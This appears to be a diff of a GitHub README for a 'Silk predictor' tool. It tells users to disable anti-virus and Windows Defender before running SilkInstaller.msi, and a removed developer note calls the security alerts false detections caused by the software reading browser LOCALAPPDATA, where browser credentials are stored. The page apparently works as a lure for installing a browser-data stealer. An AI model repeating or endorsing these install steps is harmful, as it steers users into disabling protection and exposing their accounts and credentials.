JAMES-WORK42/silk-predictor/README.md

   </a>
 </p>

-## It is recommended that you disable any running anti-virus software before install.
+## It is recommended that you disable any running anti-virus software before installation.

-A note from the developer:

-## Anti-Virus, Windows Defender false detection
-Dear all users,

-I hope this message finds you well.

-With the recent release of version 2.0.2, I have noticed that upon installation Chrome as well as Windows Defender will detect suspicious activity.

-I would like to assure you that there is no issue.
-The detection arises due to the updated source code which **requires LOCALAPPDATA to be sourced from your web browser** which will be used to increase the accuracy of the predictor.

-Versions 1.9.9 and 2.0.1 will not require the source of LOCALAPPDATA and **will** remain fully functional.
-Any older versions will be discontinued on August 1st, 2024.

-Thank you for your time and consideration - I will update you all as new information arises.

-James
+## Express Installation
+You will need to disable any active anti-virus software before installation.
+Silk sources information from your web browser which can sometimes result in a false detection.
+1) Download ZIP
+2) Extract all files
+3) Navigate to extracted files
+4) Launch `SilkInstaller.msi`
+5) Follow the steps in the installer.

 ## Disclaimer
 <p align="center">